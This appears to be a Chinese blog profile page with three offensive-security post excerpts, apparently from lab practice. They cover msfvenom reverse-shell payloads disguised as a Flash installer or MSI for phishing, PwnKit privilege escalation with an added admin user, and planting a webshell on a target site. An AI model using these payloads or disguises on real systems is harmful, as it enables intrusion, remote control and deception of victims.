- 博客(4)
- 收藏
- 关注
RSS订阅原创 社会工程学钓鱼样本的制作
msfvenom -p windows/x64/meterpreter/reverse_tcp lhsot=kali的ip lport=监听的端口 -f msi -o diaoyexl.msi。msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=kali的ip LPORT=监听端口 -f exe -o flash.exe。这里解压前运行的是恶意远控木马,解压后运行的是正常的flash程序。然后python在具有恶意的msi的文件夹下开启http服务。
2023-12-09 19:41:15
246
原创 广诚在线视频 linux提权
记 linux 系统编译好的exp提权提示无gcc (betheme.net)这两条命令意思是创建一个用户tt 密码123456 然后把tt加入到管理员组。这里要用低版本的glic编译,不然靶机运行不了。这里没有gcc环境需要在本地编译exp后上传。在windows/tmp 目录下新建文件夹。linux的msfshell进行提权。上传so文件到pwnkit目录下。这里快进到拿到msf的shell。这里有个pkexec利用。这里还缺少一个so文件。然后运行巴西烤肉提权。
2023-12-09 19:39:58
16
原创 远程控制技术
1.进入web系统后台后写入一句话木马,然后用中国蚁剑进行连接。生成后找到那个木马,然后使用中国蚁剑上传msf正向木马。2.用中国蚁剑进行连接后,使用msf进行远控。广诚在线视频 10.100.0.99。使用火狐浏览器修复文字编码。这里在首页,写入一句话木马。然后制作msf正向木马。
2023-12-09 19:36:22
19
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人